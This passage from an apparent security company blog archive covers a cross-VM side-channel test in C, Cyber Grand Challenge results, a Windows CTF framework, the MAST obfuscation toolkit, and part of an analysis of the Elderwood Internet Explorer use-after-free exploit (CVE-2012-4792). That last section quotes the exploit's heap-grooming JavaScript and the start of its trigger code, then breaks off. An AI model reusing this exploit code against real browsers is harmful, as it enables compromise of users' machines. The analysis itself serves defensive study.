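        memory_order_relaxed);
    return 0;
}

static void *fenced_b(void *arg) {
    (void)arg;
    atomic_store_explicit(&Y, 1, memory_order_relaxed);  // STORE Y
    atomic_thread_fence(memory_order_seq_cst);           // mfence on x86
    atomic_store_explicit(&r2,
        atomic_load_explicit(&X, memory_order_relaxed),  // LOAD  X
        memory_order_relaxed);
    return 0;
}

// With both threads fenced, this always returns 0: the recorded
// average drops, which is the signal the attacker detects.
int count_fenced_reorders(int trials) {
    int reorders = 0;
    for (int i = 0; i < trials; i++) {
        atomic_store(&X, 0);
        atomic_store(&Y, 0);
        pthread_t a, b;
        pthread_create(&a, 0, fenced_a, 0);
        pthread_create(&b, 0, fenced_b, 0);
        pthread_join(a, 0);
        pthread_join(b, 0);
        if (atomic_load(&r1) == 0 && atomic_load(&r2) == 0)
            reorders++;
    }
    return reorders;
}
```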


The takeaway is that even with virtualization separating your virtual machine from the hundreds of other alien virtual machines, the pipeline can’t distinguish your process’s instructions from all the others – and we can use that to our advantage. :0

If you would like to learn more about this side channel technique, please read the full paper here.

  1. https://eprint.iacr.org/2013/448.pdf
  2. http://www.ieee-security.org/TC/SP2011/PAPERS/2011/paper020.pdf
  3. https://www.cs.unc.edu/~reiter/papers/2014/CCS1.pdf
  4. http://preshing.com/20120930/weak-vs-strong-memory-models/

How We Fared in the Cyber Grand Challenge

The Cyber Grand Challenge qualifying event was held on June 3rd, at exactly noon Eastern time. At that instant, our Cyber Reasoning System (CRS) was given 131 purposely built insecure programs. During the following 24 hour period, our CRS was able to identify vulnerabilities in 65 of those programs and rewrite 94 of them to eliminate bugs built into their code. This proves, without a doubt, that it is not only possible but practical to automate the actions of a talented software auditor.

Despite the success of our CRS at finding and patching vulnerabilities, we did not qualify for the final event, to be held next year. There was a fatal flaw that lowered our overall score to 9th, below the 7th place threshold for qualification. In this blog post we’ll discuss how our CRS works, how it performed against competitor systems, what doomed its score, and what we are going to do next.

Cyber Grand Challenge Background

The goal of the Cyber Grand Challenge (CGC) is to combine the speed and scale of automation with the reasoning capabilities of human experts. Multiple teams create Cyber Reasoning Systems (CRSs) that autonomously reason about arbitrary networked programs, prove the existence of flaws in those programs, and automatically formulate effective defenses against those flaws. How well these systems work is evaluated through head-to-head tournament-style competition.

The competition has two main events: the qualifying event and the final event. The qualifying event was held on June 3, 2015. The final event is set to take place during August 2016. Only the top 7 competitors from the qualifying event proceed to the final event.

During the qualifying event, each competitor was given the same 131 challenges, or purposely built vulnerable programs, each of which contained at least one intentional vulnerability. For 24 hours, the competing CRSes faced off against each other and were scored according to four criteria. The full details are in the CGC Rules, but here’s a quick summary:

  • The CRS had to work without human intervention. Any teams found to use human assistance were disqualified.
  • The CRS had to patch bugs in challenges. Points were gained for every bug successfully patched. Challenges with no patched bugs received zero points.
  • The CRS could prove bugs exist in challenges. The points from patched challenges were doubled if the CRS could generate an input that crashed the challenge.
  • The patched challenges had to function and perform almost as well as the originals. Points were lost based on performance and functionality loss in the patched challenges.

A spreadsheet with all the qualifying event scores and other data used to make the graphs in this post is available from DARPA (Trail of Bits is the ninth place team). With the scoring in mind, let’s review the Trail of Bits CRS architecture and the design decisions we made.


We’re a small company with a distributed workforce, so we couldn’t physically host a lot of servers. Naturally, we went with cloud computing to do processing; specifically, Amazon EC2. Those who saw our tweets know we used a lot of EC2 time. Most of that usage was purely out of caution.

We didn’t know how many challenges would be in the qualifying event — just that it would be “more than 100.” We prepared for a thousand, with each accompanied by multi-gigabyte network traffic captures. We were also terrified of an EC2 region-wide failure, so we provisioned three different CRS instances, one in each US-based EC2 region, affectionately named Biggie (us-east-1), Tupac (us-west-2), and Dre (us-west-1).

It turns out that there were only 131 challenges and no gigantic network captures in the qualifying event. During the qualifying event, all EC2 regions worked normally. We could have comfortably done the qualifying event with 17 c4.8xlarge EC2 instances, but instead we used 297. Out of our abundance of caution, we over-provisioned by a factor of ~17x.

Bug Finding

The Trail of Bits CRS was ranked second by the number of verified bugs found (Figure 1). This result is impressive considering that we started with nothing while several other teams already had existing bug finding systems prior to CGC.

Figure 1: Teams in the qualifying event ranked by number of bugs found. Orange bars signify finalists.

Our CRS used a multi-pronged strategy to find bugs (Figure 2). First, there was fuzzing. Our fuzzer is implemented with a custom dynamic binary translator (DBT) capable of running several 32-bit challenges in a single 64-bit address space. This is ideal for challenges that feature multiple binaries communicating with one another. The fuzzer’s instrumentation and mutation are separated, allowing for pluggable mutation strategies. The DBT framework can also snapshot binaries at any point during execution. This greatly improves fuzzing speed, since it’s possible to avoid replaying previous inputs when exploring new input space.
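As an illustration of the mutation side of fuzzing (not our actual DBT-based fuzzer), here is a toy deterministic single-byte mutation stage in C, run against a stand-in “challenge” function; every name and the “crash” condition are hypothetical:

```c
// Toy mutational fuzzer: deterministically mutate one byte of a seed
// input at a time and report the first mutant that crashes the target.
// The target here is a stand-in "challenge", not real CGC code.
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define INPUT_LEN 4

// Hypothetical buggy target: "crashes" (returns nonzero) when the first
// byte is a magic value, standing in for a real fault detected by a DBT.
static int target_crashes(const uint8_t *input, size_t len) {
    return len > 0 && input[0] == 0x7f;
}

// Deterministic single-byte mutation stage (in the spirit of AFL's
// deterministic stage): try every value at every position. Returns 1
// and fills `crasher` if some mutant crashes, else 0.
int fuzz_one_byte(const uint8_t *seed, size_t len, uint8_t *crasher) {
    uint8_t buf[INPUT_LEN];
    if (len > INPUT_LEN)
        return 0;
    for (size_t pos = 0; pos < len; pos++) {
        for (int val = 0; val < 256; val++) {
            memcpy(buf, seed, len);
            buf[pos] = (uint8_t)val;        // the single-byte mutation
            if (target_crashes(buf, len)) { // run the mutated input
                memcpy(crasher, buf, len);  // keep the crashing input
                return 1;
            }
        }
    }
    return 0;
}
```

A real fuzzer layers many such strategies (and random ones) behind pluggable mutators, and uses snapshots to avoid re-executing the unmutated prefix of each input.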

Figure 2: Our bug finding architecture. It is a feedback-based architecture that explores the state space of a program using fuzzing and symbolic execution.


In addition to fuzzing, we had not one but two symbolic execution engines. The first operated on the original unmodified binaries, and the second operated on the translated LLVM from mcsema. Each symbolic execution engine had its own strengths, and both contributed to bug finding.

The fuzzer and symbolic execution engines operate in a feedback loop mediated by a system we call MinSet. The MinSet uses branch coverage to maintain a minimum set of maximal coverage inputs. The inputs come from any source capable of generating them: PCAPs, fuzzing, symbolic execution, etc. Every tool gets original inputs from MinSet, and feeds any newly generated inputs into MinSet. This feedback loop lets us explore the input state space with both fuzzers and symbolic execution in parallel. In practice this is very effective. We log the provenance of our crashes, and most of them look something like:

Network Capture ⇒ Fuzzer ⇒ SymEx1 ⇒ Fuzzer ⇒ Crash
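A minimal sketch of the MinSet idea, with coverage modeled as a 64-bit branch bitmask; the real system tracks much richer branch coverage and also prunes retained inputs, so treat this greedy version as illustrative only:

```c
// Greedy MinSet sketch: keep an input only if it covers a branch that
// no retained input has covered yet. Coverage is modeled as a bitmask
// of branch IDs (bit i set = branch i was taken).
#include <stdint.h>

#define MAX_KEPT 64

typedef struct {
    uint64_t coverage[MAX_KEPT]; // coverage mask per retained input
    int count;                   // number of retained inputs
    uint64_t covered;            // union of all retained coverage
} minset_t;

void minset_init(minset_t *m) {
    m->count = 0;
    m->covered = 0;
}

// Offer a new input's coverage mask. Returns 1 if the input is kept
// (it reached at least one new branch), 0 if it is discarded.
int minset_offer(minset_t *m, uint64_t coverage) {
    if ((coverage & ~m->covered) == 0 || m->count == MAX_KEPT)
        return 0;                    // nothing new: discard
    m->coverage[m->count++] = coverage;
    m->covered |= coverage;          // grow the union of covered branches
    return 1;
}
```

Every tool in the loop pulls its starting corpus from the retained set and pushes any input it generates back through `minset_offer`-style filtering.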

Some bugs can only be triggered when the input replays a previous nonce, which would be different on every execution of the challenge. Our bug finding system can produce inputs that contain variables based on program outputs, enabling our CRS to handle such cases.

Additionally, our symbolic executors are able to identify which inputs affect program state at the point of a crash. This is a key requirement for the success of any team competing in the final as it enables the CRS to create a more controlled crash.


Patching

Our CRS’s patching effectiveness, as measured by the security score, ranks fourth (Figure 3).

Figure 3: Teams in the qualifying event ranked by patch effectiveness (security score). Orange bars signify finalists.


Our CRS patches bugs by translating challenges into LLVM bitcode with mcsema. Patches are applied to the LLVM bitcode, optimized, and then converted back into executable code. The actual patching works by gracefully terminating the challenge when invalid memory accesses are detected. Patching the LLVM bitcode representation of challenges provides us with enormous power and flexibility:

  • We can easily validate any memory access and keep track of all memory allocations.
  • Complex algorithms, such as dataflow tracking, dominator trees, dead store elimination, loop detection, etc., are very simple to implement using the LLVM compiler infrastructure.
  • Our patching method can be used on real-world software, not just CGC challenges.

We created two main patching strategies: generic patching and bug-based patching. Generic patching is an exclusion-based strategy: it first assumes that every memory access must be verified, and then excludes accesses that are provably safe. The benefit of generic patching is that it patches all possible invalid memory accesses in a challenge. Bug-based patching is an inclusion-based strategy: it first assumes only one memory access (where the CRS found a bug) must be verified, and then includes nearby accesses that may be unsafe. Each patching strategy has multiple heuristics to determine which accesses should be included or excluded from verification.
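Conceptually, a guarded access behaves like the hypothetical C sketch below; the real checks are inserted into mcsema-lifted LLVM bitcode rather than written by hand, and the allocation tracking is far more complete:

```c
// Sketch of the runtime check behind generic patching: every guarded
// access is validated against a table of live allocations, and an
// invalid access gracefully terminates instead of corrupting memory.
#include <stdint.h>
#include <stdlib.h>

#define MAX_ALLOCS 128

typedef struct { uintptr_t base; size_t size; } alloc_t;
static alloc_t allocs[MAX_ALLOCS];
static int n_allocs;

// Called at allocation sites to record a live region.
void note_alloc(void *p, size_t size) {
    if (n_allocs < MAX_ALLOCS) {
        allocs[n_allocs].base = (uintptr_t)p;
        allocs[n_allocs].size = size;
        n_allocs++;
    }
}

// Is the range [p, p+len) inside some recorded allocation?
int access_is_valid(const void *p, size_t len) {
    uintptr_t a = (uintptr_t)p;
    for (int i = 0; i < n_allocs; i++)
        if (a >= allocs[i].base &&
            a + len <= allocs[i].base + allocs[i].size)
            return 1;
    return 0;
}

// The check inserted before each guarded load/store: terminate
// gracefully (as the patched challenges do) on an invalid access.
void guard_access(const void *p, size_t len) {
    if (!access_is_valid(p, len))
        _Exit(1);   // graceful termination, not a crash
}
```

Generic patching wraps every access in a `guard_access`-style check and then proves some of them safe to remove; bug-based patching starts from one known-bad access and expands outward.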

The inclusion and exclusion heuristics generate patched challenges with different security/performance tradeoffs. The patched challenges generated by these heuristics were tested for performance and security to determine which heuristic performed best while still fixing the bug. For the qualifying event, we evaluated both generic and bug-based patching, but ultimately chose a generic-only patching strategy. Bug-based patching was slightly more performant, but generic patching was more comprehensive and it patched bugs that our CRS couldn’t find.

Functionality and Performance

Functionality and performance scores combine to create an availability score. The availability score is used as a scaling factor for points gained by patching and bug finding. This scaling factor only matters for successfully patched challenges, since those are the only challenges that can score points. The following graphs only consider functionality and performance of successfully patched challenges.


Out of the 94 challenges that our CRS successfully patched, 56 retained full functionality, 30 retained partial functionality, and 8 were nonfunctional. Of the top 10 teams in the qualifying event, our CRS ranks 5th in terms of fully functional patched challenges (Figure 4). We suspect our patched challenges lost functionality due to problems in mcsema, our x86 to LLVM translator. We hope to verify and address these issues once DARPA open-sources the qualifying event challenges.

Figure 4: The count of perfectly functional, partially functional, and nonfunctional challenges submitted by each of the top 10 teams in the qualifying event. Orange bars signify finalists.



The performance of patched challenges is how our CRS snatched defeat from the jaws of victory. Of the top ten teams in the qualifying event, our CRS placed last in terms of patched challenge performance (Figure 5).

Figure 5: Average and median performance scores of the top ten qualifying event participants. Orange bars signify finalists.


Our CRS produces slow binaries for two reasons: technical and operational. The technical reason is that performance of our patched challenges is an artifact of our patching process, which translates challenges into LLVM bitcode and then re-emits them as executable binaries. The operational reason is that our patching was developed late and optimized for the wrong performance measurements.

So, why did we optimize for the wrong performance measurements? The official CGC performance measurement tools were kept secret, because the organizers wanted to ensure that no one could cheat by gaming the performance measurements. Therefore, we had to measure performance ourselves, and our metrics showed that CPU overhead of our patched challenges was usually negligible. The main flaw that we observed was that our patched challenges used too much memory. Because of this, we spent time and effort optimizing our patching to use less memory in favor of using more CPU time.

It turns out we optimized for the wrong thing, because our self-measurement did not agree with the official measurement tools (Table 1). When self-measuring, our worst-performing patching method had a median CPU overhead of 33% and a median memory overhead of 69%. The official qualifying event measured us at 76% CPU overhead and 28% memory overhead. Clearly, our self-measurements were considerably different from official measurements.

Measurement                            Median CPU Overhead    Median Memory Overhead
Worst Self-Measured Patching Method    33%                    69%
Official Qualifying Event              76%                    28%

Table 1: Self measured CPU and memory overhead and the official qualifying event CPU and memory overhead.

Our CRS measured its overall score with our own performance metrics. The self-measured score of our CRS was 106, which would have put us in second place. The real overall score was 21.36, putting us in ninth.

An important aspect of software development is choosing where to focus your efforts, and we chose poorly. CGC participants had access to the official measuring system during two scored events held during the year, one in December 2014 and one in April 2015. We should have evaluated our patching system thoroughly during both scored events. Unfortunately, our patching wasn’t fully operational until after the second scored event, so we had no way to verify the accuracy of our self-measurement. The performance penalty of our patching isn’t a fundamental issue. Had we known how bad it was, we would have fixed it. However, according to our own measurements the patching was acceptable so we focused efforts elsewhere.

What’s Next?

According to the CGC FAQ (Question 46), teams are allowed to combine after the qualifying event. We hope to join forces with another team that qualified for the CGC final event, and use the best of both our technologies to win. The technology behind our CRS will provide a significant advantage to any team that partners with us. If you would like to discuss a potential partnership for the CGC final, please contact us at cgc@trailofbits.com.

If we cannot find a partner for the CGC final, we will focus our efforts on adapting our CRS to automatically find and patch vulnerabilities in real software. Our system is up to the task: it has already proven that it can find bugs, and all of its core components were derived from software that works on real Linux binaries. Several components even have Windows and 64-bit support, and adding support for other platforms is a possibility. If you are interested in commercial applications of our technology, please get in touch with us at cgc@trailofbits.com.

Finally, we plan to contribute back fixes and updates to the open source projects utilized in our CRS. We used numerous open source projects during development, and have made several custom fixes and modifications. We look forward to contributing these back to the community so that everyone benefits from our improvements.

Closing the Windows Gap

The security research community is full of grey beards that earned their stripes writing exploits against mail servers, domain controllers, and TCP/IP stacks. These researchers started writing exploits on platforms like Solaris, IRIX, and BSDi before moving on to Windows exploitation. Now they run companies, write policy, rant on twitter, and testify in front of congress. I’m not one of those people; my education in security started after Windows Vista and then expanded through Capture the Flag competitions when real-world research got harder. Security researchers entering the industry post-2010 [1] learn almost exclusively via Capture the Flag competitions.

Occasionally, I’ll try to talk a grey beard into playing capture the flag. It’s like trying to explain Pokemon to adults. Normally such endeavors are an exercise in futility; however, on a rare occasion they’ll get excited and agree to try it out! They then get frustrated and stuck on the same problems I do – it’s fantastic for my ego [2].

“Ugh, it’s 90s shellcoding problems applied today.”
— muttered during DEFCON 22 CTF Quals

Following a particularly frustrating CTF we were discussing challenges and how there are very few Windows challenges despite Windows being such an important part of our industry. Only the Russian CTFs release Windows challenges; none of the large American CTFs do.

Much like Cold War-era politics, the Russians (in CTFs) have edged out a Windows superiority – a Windows gap.

Projected magnitude of the Windows gap


The Windows gap exists outside of CTF as well. Over the past few years the best Windows security research has come out of Russia [3] and China. So, why are the Russians and Chinese so good at Windows? Well, because they actually use Windows…and for some reason western security researchers don’t.

Let’s close this Windows gap. Windows knowledge is important for our industry.

Helping the CTF community

If Capture the Flag competitions are how today’s greenhorns cut their teeth, we should have more Windows-based challenges and competitions. To facilitate this, Trail of Bits is releasing AppJailLauncher, a framework for making exploitable Windows challenges!

This man knows Windows and thinks you should too.


As a contest organizer, securing your infrastructure is the biggest priority, and securing Windows services was always a bit tricky until Windows 8 introduced AppContainers. AppJailLauncher uses AppContainers to keep everything nice and secure from griefers. The repository includes everything you need to isolate a Windows TCP service from the rest of the operating system.

Additionally, we’re releasing the source code to greenhornd, a 2014 CSAW challenge I wrote to introduce people to Windows exploitation and the best debugger yet developed: WinDbg. The repository includes the binary as released, deployment directions, and a proof-of-vulnerability script.

We’re hoping to help drag the CTF community kicking and screaming into Windows expertise.

Windows Reactions

Releasing a Windows challenge last year at CSAW was very entertaining. There was plenty of complaining [4]:

<dwn> how is this windows challenge only 200 points omg
<dwn> making the vuln obvious doesn’t make windows exploitation any easier ;_;

<mserrano> RyanWithZombies: dude but its fuckin windows
<mserrano> even I don’t use windows anymore
<@RyanWithZombies> i warned you guys for months
<mserrano> also man windows too hard

<geohot> omg windows
<geohot> is so hard
<geohot> will do tomorrow
<geohot> i don’t have windows vm

<ebeip90> zomg a windows challenge
[ hours later ]
<ebeip90> remember that part a long time ago when I said “Oh yay, a Windows challenge”?

<ricky> Windows is hard
<miton> ^

Some praise:

<cai_> i liked your windows one btw:)

<MMavipc> RyanWithZombies pls more windows pwning/rce

<CTFBroforce> I was so confused I have never done a windows exploit
<CTFBroforce> this challenge is going to make me look into windows exploits
<CTFBroforce> I dont know how to write windows shell code

<spq> thx for the help and the force to exploit windows with shellcode for the first time:)

It even caused some arguments among competitors:

<clockish> dudes, shut up, windows is hard
<MMavipc> windows is easy
<MMavipc> linux is hard

We hope AppJailLauncher will be used to elicit more passionate responses over the next few years!

  1. Many of the most popular CTFs started in 2010 and 2011: Ghost in the Shellcode (2010), RuCTFe (2010), PlaidCTF (2011), Codegate (2011), PHDays (2011). Very few predate 2010.
  2. Much like watching geohot fail at format string exploitation during a LiveCTF broadcast: https://www.youtube.com/watch?v=td1KEUhlSuk
  3. Try searching for obscure Windows kernel symbols, you’ll end up on a Russian forum.
  4. The names have not been changed to shame the enablers.

ReMASTering Applications by Obfuscating during Compilation

In this post, we discuss the creation of a novel software obfuscation toolkit, MAST, implemented in the LLVM compiler and suitable for denying program understanding to even the most well-resourced adversary. Our implementation is inspired by effective obfuscation techniques used by nation-state malware and techniques discussed in academic literature. MAST enables software developers to protect applications with technology developed for offense.

MAST is a product of Cyber Fast Track, and we would like to thank Mudge and DARPA for funding our work. This project would not have been possible without their support. MAST is now a commercial product offering of Trail of Bits and companies interested in licensing it for their own use should contact info@trailofbits.com.


There are a lot of risks in releasing software these days. Once upon a time, reverse engineering software presented a challenge best solved by experienced and skilled reverse engineers at great expense. It was worthwhile for reasonably well-funded groups to reverse engineer and recreate proprietary technology or for clever but bored people to generate party tricks. Despite the latter type of people causing all kinds of mild internet havoc, reverse engineering wasn’t widely considered a serious threat until relatively recently.

Over time, however, the stakes have risen; criminal entities, corporations, and even nation-states have become extremely interested in software vulnerabilities. These entities seek either to defend their own networks, applications, and users, or to attack someone else’s. Historically, software obfuscation was a concern of the “good guys”, who were interested in protecting their intellectual property. It wasn’t long before malicious entities began obfuscating their own tools, to protect them from analysis if captured.

A recent example of successful obfuscation is the one used by the authors of the Gauss malware; several days after discovering the malware, Kaspersky Lab, a respected malware analysis lab and antivirus company, posted a public plea for assistance in decrypting a portion of its code. That even a company of professionals had enough trouble to ask for outside help is telling: obfuscation can be very effective. Professional researchers have been unable to deobfuscate Gauss to this day.


With all of this in mind, we were inspired by Gauss to create a software protection system that leapfrogs available analysis technology. Could we repurpose techniques from software exploitation and malware obfuscation into a state-of-the-art software protection system? Our team is quite familiar with publicly available tools for assisting in reverse engineering tasks and considered how to significantly reduce their efficacy, if not deny it altogether.

Software developers seek to protect varying classes of information within a program. Our system must account for each with equal levels of protection to satisfy these potential use cases:

  • Algorithms: adversary knowledge of proprietary technology
  • Data: knowledge of proprietary data (the company’s or the user’s)
  • Vulnerabilities: knowledge of vulnerabilities within the program

In order for the software protection system to be useful to developers, it must be:

  • Easy to use: the obfuscation should be transparent to our development process, not alter or interfere with it. No annotations should be necessary, though we may want them in certain cases.
  • Cross-platform: the obfuscation should apply uniformly to all applications and frameworks that we use, including mobile or embedded devices that may run on different processor architectures.
  • Protect against state-of-the-art analysis: our obfuscation should leapfrog available static analysis tools and techniques and require novel research advances to see through.

Finally, we assume an attacker will have access to the static program image; many software applications are going to be directly accessible to a dedicated attacker. For example, an attacker interested in a mobile application, anti-virus signatures, or software patches will have the static program image to study.

Our Approach

We decided to focus primarily on preventing static analysis; these days there are many tools that can be run statically over application binaries, giving attackers information with little work or time, and many attackers are proficient at generating their own situation-specific tools. Static tools can often be run very quickly over large amounts of code, without requiring an environment in which to execute the target binary.

We decided on a group of techniques that compose together, comprising opaque predicate insertion, code diffusion, and – because our original scope was iOS applications – mangling of Objective-C symbols. These make the protected application impossible to understand without environmental data, impossible to analyze with current static analysis tools due to alias analysis limitations, and deny the effectiveness of breakpoints, method name retrieval scripts, and other common reversing techniques. In combination, these techniques attack a reverse engineer’s workflow and tools from all sides.

Further, we did all of our obfuscation work inside of a compiler (LLVM) because we wanted our technology to be thoroughly baked into the entire program. LLVM can use knowledge of the program to generate realistic opaque predicates or hide diffused code inside of false paths not taken, forcing a reverse engineer to consult the program’s environment (which might not be available) to resolve which instruction sequences are the correct ones. Obfuscating at the compiler level is more reliable than operating on an existing binary: there is no confusion about code vs. data or missing critical application behavior. Additionally, compiler-level obfuscation is transparent to current and future development tools based on LLVM. For instance, MAST could obfuscate Swift on the day of release — directly from the Xcode IDE.

Symbol Mangling

The first and simplest technique was to hinder quick Objective-C method name retrieval scripts; this is certainly the least interesting of the transforms, but would remove a large amount of human-readable information from an iOS application. Without method or other symbol names present for the proprietary code, it’s more difficult to make sense of the program at a glance.

Opaque Predicate Insertion

The second technique we applied, opaque predicate insertion, is not new. It has been done before in numerous ways, and capable analysts have developed ways around many of the common implementations. We created a stronger version of predicate insertion by inserting predicates with opaque conditions and alternate branches that look realistic to a script or a person skimming the code. Realistic predicates significantly slow down a human analyst, and also slow down tools that operate on program control flow graphs (CFGs) by ballooning the graph to be much larger than the original. The increased CFG size impacts the size of the program and its execution speed, but our testing indicates the impact is smaller than or comparable to that of similar tools.
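A classic (and deliberately simple-looking) example of an opaque predicate: x*(x+1) is always even, so the branch below always takes the true path, yet proving that requires value reasoning most tools skip. MAST generates its predicates from program context, so they look far less suspicious than this hand-written sketch; all names here are illustrative:

```c
// Sketch of an opaque predicate. The product of two consecutive
// integers is always even (this holds even under unsigned wraparound,
// since 2 divides 2^32), so opaque_true() always returns 1.
#include <stdint.h>

static int opaque_true(uint32_t x) {
    return ((x * (x + 1)) & 1) == 0;
}

// Wrap a real computation in the predicate; the else-branch is a
// plausible-looking decoy that never executes but bloats the CFG.
uint32_t guarded_add(uint32_t a, uint32_t b) {
    if (opaque_true(a ^ b)) {
        return a + b;              // the path actually taken
    } else {
        return (a << 3) - b * 7;   // realistic-looking dead code
    }
}
```

An analyst (or a CFG-based tool) must reason about the condition to learn that the decoy branch is unreachable; multiplied across a whole program, that cost adds up.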

Code Diffusion

The third technique, code diffusion, is by far the most interesting. We took the ideas of Return-Oriented Programming (ROP) and applied them in a defensive manner.

In a straightforward situation, an attacker exploits a vulnerability in an application and supplies their own code for the target to execute (shellcode). However, since the introduction of non-executable data mitigations like DEP and NX, attackers have had to find ways to execute malicious code without the introduction of anything new. ROP is a technique that makes use of code that is already present in the application. Usually, an attacker would compile a set of short “gadgets” in the existing program text that each perform a simple task, and then link those together, jumping from one to the other, to build up the functionality they require for their exploit — effectively creating a new program by jumping around in the existing program.

We transform application code such that it jumps around in a ROP-like way, scrambling the program’s control flow graph into disparate units. However, unlike ROP, where attackers are limited by the gadgets they can find and their ability to predict their location at runtime, we precisely control the placement of gadgets during compilation. For example, we can store gadgets in the bogus programs inserted during the opaque predicate obfuscation. After applying this technique, reverse engineers will immediately notice that the handy graph is gone from tools like IDA. Further, this transformation makes it impossible to use state-of-the-art static analysis tools, like BAP, and impedes dynamic analysis techniques that rely on concrete execution with a debugger. Code diffusion destroys the semantic value of breakpoints, because a single code snippet may be re-used by many different functions and not used by other instances of the same function.

Figure: Native code before obfuscation with MAST (the graph view is useful)

Figure: Native code after obfuscation with MAST (the graph view is useless)

The figures above demonstrate a very simple function before and after the code diffusion transform, using screenshots from IDA. In the first figure, there is a complete control flow graph; in the second, however, the first basic block no longer jumps directly to either of the following blocks; instead, it must refer at runtime to a data section elsewhere in the application before it knows where to jump in either case. Running this code diffusion transform over an entire application reduces the entire program from a set of connected-graph functions to a much larger set of single-basic-block “functions.”

Code diffusion has a noticeable performance impact on whole-program obfuscation. In our testing, we compared the speed of bzip2 before and after our return-oriented transformation and slowdown was approximately 55% (on x86).

Environmental Keying

MAST does one more thing to make reverse engineering even more difficult — it ties the execution of the code to a specific device, such as a user’s mobile phone. While using device-specific characteristics to bind a binary to a device is not new (it is extensively used in DRM and some malware, such as Gauss), MAST is able to integrate device-checking into each obfuscation layer as it is woven through the application. The intertwining of environmental keying and obfuscation renders the program far more resistant to reverse-engineering than some of the more common approaches to device-binding.

Rather than only acquiring a copy of the application, an attacker must also acquire and analyze the execution environment of the target device. The whole environment is typically far more challenging to get ahold of, and contains a much larger quantity of code to analyze. Even if the environment is captured and time is taken to reverse engineer application details, the results will not be useful against the same application running on other hosts, because every host runs its own keyed version of the binary.


In summary, MAST is a suite of compile-time transformations that provide easy-to-use, cross-platform, state-of-the-art software obfuscation. It can be used for a number of purposes, such as preventing attackers from reverse engineering security-related software patches; protecting your proprietary technology; protecting data within an application; and protecting your application from vulnerability hunters. While originally scoped for iOS applications, the technologies are applicable to any software that can be compiled with LLVM.

Dear DARPA: Challenge Accepted.


We are proud to have one of only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge.

Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge, a first-of-its-kind tournament designed to speed the development of automated security systems able to defend against cyberattacks as fast as they are launched. DARPA also announced today that it has reached an agreement to hold the 2016 Cyber Grand Challenge final competition in conjunction with DEF CON, one of the largest computer security conferences in the world.


Our participation in this program aligns with our development of Javelin, an automated system for simulating attacks against enterprise networks. We have assembled a world-class team of experts in software security, capture the flag, and program analysis to compete in this challenge. As much as we wish the other teams luck in this competition, Trail of Bits is playing to win. Game on!

Introducing Javelin


Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving security and accelerating threat detection. Highly automated, low touch, and designed for easy adoption, Javelin will harden your existing security and information technology infrastructure.

Read more about Javelin on the Javelin Blog.

Writing Exploits with the Elderwood Kit (Part 2)

In the final part of our three-part series, we investigate how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit.

Last time, we talked about how the Elderwood kit does almost everything for the kit user except give them a vulnerability to use. We think it is up to the user to discover a vulnerability, trigger and exploit it, then integrate it with the kit. Our analysis indicates that their knowledge of how to do this is poor and the reliability of the exploit suffered as a result. In the sections that follow, we walk through each section of the exploit that the user had to write on their own.

The Document Object Model (DOM)

The HTML Document Object Model (DOM) is a representation of an HTML page, used for accessing and modifying properties. Browsers provide an interface to the DOM via JavaScript. This interface allows websites to have interactive and dynamically generated content. This interface is very complicated and is subject to many security flaws such as the use-after-free vulnerability used by the attackers in the CFR compromise. For example, the Elderwood group has been responsible for discovering and exploiting at least three prior vulnerabilities of this type in Internet Explorer.

Use-after-Free Vulnerabilities

Use-after-free vulnerabilities occur when a program frees a block of memory and then attempts to use it at some later point in program execution. If, before the block is reused, an attacker is able to allocate new data in its place, then they can gain control of program flow.

Exploiting a Use-after-Free

  1. Program allocates and then later frees block A
  2. Attacker allocates block B, reusing the memory previously allocated to block A
  3. Attacker writes data into block B
  4. Program uses freed block A, accessing the data the attacker left there

In order to take advantage of CVE-2012-4792, the exploit allocated and freed a CButton object. While a weak reference to the freed object was maintained elsewhere in Internet Explorer, the exploit overwrote the CButton object with their own data. The exploit then triggered a virtual function call on the CButton object, using the weak reference, resulting in control of program execution.

Prepare the Heap

After 16 allocations of the same size occur, Internet Explorer will switch to using the Low Fragmentation Heap (LFH) for further heap allocations. Since these allocations exist on a different heap, they are not usable for exploitation and have to be ignored. To safely skip over the first 16 allocations, the exploit author creates 3000 string allocations of a similar size to the CButton object by assigning the className property on a div tag.

var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
	arrObject[i] = document.createElement('div');
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}

The contents of the chosen string, repeated “ab”s, are not important. What is important is the size of the allocation it creates. The LFH has an 8 byte granularity for allocations less than 256 bytes, so allocations between 80 and 88 bytes will be allocated from the same area. Here is an example memory dump of what the string would look like in memory:

00227af8  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b08  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b18  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b28  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b38  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b48  61 00 00 00 00 00 00 00-0a 7e a8 ea 00 01 08 ff  a........~......

Then, the exploit author assigns the className of every other div tag to null, freeing the previously created strings when CollectGarbage() is called. This creates holes in the allocated heap memory and a predictable pattern of allocations.

for (var i = 0; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}

Next, the author creates 500 button elements. As before, they free every other one to create holes and call CollectGarbage() to enable reuse of the allocations.

for (var i = 0; i < elmObject.length; i++) {
	elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}

In one of many examples of reused code in the exploit, the JavaScript array used for heap manipulation is called arrObject. This happens to be the variable name given to an example of how to create arrays found on page 70 of the JavaScript Cookbook.

Trigger the Vulnerability

The code below is responsible for creating the use-after-free condition. The applyElement and appendChild calls create the right conditions and new allocations. The free will occur after setting the outerText property on the q tag and then calling CollectGarbage().

try {
	e0 = document.getElementById("a");
	e1 = document.getElementById("b");
	e2 = document.createElement("q");
	e2.outerText = "";
